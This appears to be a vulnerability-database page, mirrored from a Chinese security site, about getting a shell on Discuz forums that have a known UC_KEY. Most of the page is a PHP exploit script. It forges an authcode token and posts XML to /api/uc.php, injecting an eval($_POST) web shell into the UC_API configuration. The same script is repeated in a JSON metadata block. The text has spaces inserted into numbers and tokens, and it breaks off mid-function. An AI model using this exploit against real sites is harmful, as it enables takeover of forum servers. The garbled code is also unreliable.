Search...

Discuz use UC_KEY be getshell-a vulnerability warning-the black bar safety net

2014-01-13T00:00:00

ID MYHACK58:62201441801
Type myhack58
Reporter 佚名
Modified 2014-01-13T00:00:00

Description

From:http://www. tick. org/bugs/tick-2 0 1 4-0 4 8 1 3 7

<? php

// Code copyright belongs to the original author all!

$timestamp = time()+1 0*3 6 0 0;

$host="127.0.0.1";

$uc_key="eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5waofq6j285ca33i151e551g0l9f2l3dd";

$code=urlencode(_authcode("time=$timestamp&action=updateapps", 'ENCODE', $uc_key));

$cmd1='<? xml version="1.0" encoding="ISO-8 8 5 9-1"?& gt;

<root>

<item id="UC_API">http://x\');eval($_POST[DOM]);//</item>

</root>';

$cmd2='<? xml version="1.0" encoding="ISO-8 8 5 9-1"?& gt;

<root>

<item id="UC_API">http://x</item>

</root>';

$html1 = send($cmd1);

echo $html1;

$html2 = send($cmd2);

echo $html2;

function send($cmd){

global $host,$code;

$message = "POST /api/uc. php? code=".$ code." HTTP/1.1\r\n";

$message .= "Accept: /\r\n";

$message .= "Referer: ".$ host."\ r\n";

$message .= "Accept-Language: zh-cn\r\n";

$message .= "Content-Type: application/x-www-form-urlencoded\r\n";

$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";

$message .= "Host: ".$ host."\ r\n";

$message .= "Content-Length: ". strlen($cmd)."\ r\n";

$message .= "Connection: Close\r\n\r\n";

$message .= $cmd;

//var_dump($message);

$fp = fsockopen($host, 8 0);

fputs($fp, $message);

$resp = ";

while ($fp && ! feof($fp))

$resp .= fread($fp, 1 0 2 4);

return $resp;

}

function _authcode($string, $operation = 'DECODE', $key = ", $expiry = 0) {

$ckey_length = 4;

$key = md5($key ? $key : UC_KEY);

$keya = md5(substr($key, 0, 1 6));

$keyb = md5(substr($key, 1 6, 1 6));

$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ";

$cryptkey = $keya. md5($keya.$ keyc);

$key_length = strlen($cryptkey);

$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0). substr(md5($string.$ keyb), 0, 1 6).$ string;

$string_length = strlen($string);

$result = ";

$box = range(0, 2 5 5);

$rndkey = array();

for($i = 0; $i <= 2 5 5; $i++) {

$rndkey[$i] = ord($cryptkey[$i % $key_length]);

}

for($j = $i = 0; $i < 2 5 6; $i++) {

$j = ($j + $box[$i] + $rndkey[$i]) % 2 5 6;

$tmp = $box[$i];

$box[$i] = $box[$j];

$box[$j] = $tmp;

}

for($a = $j = $i = 0; $i < $string_length; $i++) {

$a = ($a + 1) % 2 5 6;

$j = ($j + $box[$a]) % 2 5 6;

$tmp = $box[$a];

$box[$a] = $box[$j];

$box[$j] = $tmp;

$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 2 5 6]));

}

if($operation == 'DECODE') {

if((substr($result, 0, 1 0) == 0 || substr($result, 0, 1 0) - time() > 0) && substr($result, 1 0, 1 6) == substr(md5(substr($result, 2 6).$ keyb), 0, 1 6)) {

return substr($result, 2 6);

[1] [2] next

JSON Vulners Source

Initial Source

{"viewCount": 4, "id": "MYHACK58:62201441801", "edition": 1, "history": [], "reporter": "\u4f5a\u540d", "lastseen": "2016-10-30T11:02:40", "published": "2014-01-13T00:00:00", "bulletinFamily": "info", "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.2", "type": "myhack58", "modified": "2014-01-13T00:00:00", "hash": "c7bc5b79984cb337707dc49c44846164063bca3d89232eb131c921f57ccd0367", "title": "Discuz use UC_KEY be getshell-a vulnerability warning-the black bar safety net", "cvelist": [], "references": [], "cvss": {"vector": "NONE", "score": 0.0}, "hashmap": [{"hash": "caf9b6b99962bf5c2264824231d7a40c", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "60d75cf02ee88ea6d6ae185fe6667910", "key": "description"}, {"hash": "3b2616a996ed383943fc7deb979c7391", "key": "href"}, {"hash": "0b16638a7964db19eaaf438961f6bd33", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "0b16638a7964db19eaaf438961f6bd33", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "645396391020478112635e14b34a0f8b", "key": "reporter"}, {"hash": "93190223b470eb2757f599f441f7eb97", "key": "title"}, {"hash": "0665a8b0792e65b50ab13aef58a018dc", "key": "type"}], "description": "From:http://www. tick. org/bugs/tick-2 0 1 4-0 4 8 1 3 7\n\n<? php\n\n// Code copyright belongs to the original author all!\n\n$timestamp = time()+1 0*3 6 0 0;\n\n$host=\"127.0.0.1\";\n\n$uc_key=\"eapf15K8b334Bc8eBeY4Gfn1VbqeA0N5waofq6j285ca33i151e551g0l9f2l3dd\";\n\n$code=urlencode(_authcode(\"time=$timestamp&action=updateapps\", 'ENCODE', $uc_key));\n\n$cmd1='<? xml version=\"1.0\" encoding=\"ISO-8 8 5 9-1\"?& gt;\n\n<root>\n\n<item id=\"UC_API\">http://x\\');eval($_POST[DOM]);//</item>\n\n</root>';\n\n$cmd2='<? xml version=\"1.0\" encoding=\"ISO-8 8 5 9-1\"?& gt;\n\n<root>\n\n<item id=\"UC_API\">http://x</item>\n\n</root>';\n\n$html1 = send($cmd1);\n\necho $html1;\n\n$html2 = send($cmd2);\n\necho $html2;\n\nfunction send($cmd){\n\nglobal $host,$code;\n\n$message = \"POST /api/uc. php? code=\".$ code.\" HTTP/1.1\\r\\n\";\n\n$message .= \"Accept: */*\\r\\n\";\n\n$message .= \"Referer: \".$ host.\"\\ r\\n\";\n\n$message .= \"Accept-Language: zh-cn\\r\\n\";\n\n$message .= \"Content-Type: application/x-www-form-urlencoded\\r\\n\";\n\n$message .= \"User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\\r\\n\";\n\n$message .= \"Host: \".$ host.\"\\ r\\n\";\n\n$message .= \"Content-Length: \". strlen($cmd).\"\\ r\\n\";\n\n$message .= \"Connection: Close\\r\\n\\r\\n\";\n\n$message .= $cmd;\n\n//var_dump($message);\n\n$fp = fsockopen($host, 8 0);\n\nfputs($fp, $message);\n\n$resp = \";\n\nwhile ($fp && ! feof($fp))\n\n$resp .= fread($fp, 1 0 2 4);\n\nreturn $resp;\n\n}\n\nfunction _authcode($string, $operation = 'DECODE', $key = \", $expiry = 0) {\n\n$ckey_length = 4;\n\n$key = md5($key ? $key : UC_KEY);\n\n$keya = md5(substr($key, 0, 1 6));\n\n$keyb = md5(substr($key, 1 6, 1 6));\n\n$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : \";\n\n$cryptkey = $keya. md5($keya.$ keyc);\n\n$key_length = strlen($cryptkey);\n\n$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0). substr(md5($string.$ keyb), 0, 1 6).$ string;\n\n$string_length = strlen($string);\n\n$result = \";\n\n$box = range(0, 2 5 5);\n\n$rndkey = array();\n\nfor($i = 0; $i <= 2 5 5; $i++) {\n\n$rndkey[$i] = ord($cryptkey[$i % $key_length]);\n\n}\n\nfor($j = $i = 0; $i < 2 5 6; $i++) {\n\n$j = ($j + $box[$i] + $rndkey[$i]) % 2 5 6;\n\n$tmp = $box[$i];\n\n$box[$i] = $box[$j];\n\n$box[$j] = $tmp;\n\n}\n\nfor($a = $j = $i = 0; $i < $string_length; $i++) {\n\n$a = ($a + 1) % 2 5 6;\n\n$j = ($j + $box[$a]) % 2 5 6;\n\n$tmp = $box[$a];\n\n$box[$a] = $box[$j];\n\n$box[$j] = $tmp;\n\n$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 2 5 6]));\n\n}\n\nif($operation == 'DECODE') {\n\nif((substr($result, 0, 1 0) == 0 || substr($result, 0, 1 0) - time() > 0) && substr($result, 1 0, 1 6) == substr(md5(substr($result, 2 6).$ keyb), 0, 1 6)) {\n\nreturn substr($result, 2 6);\n\n**[1] [[2]](<41801_2.htm>) [next](<41801_2.htm>)**\n", "href": "http://www.myhack58.com/Article/html/3/62/2014/41801.htm"}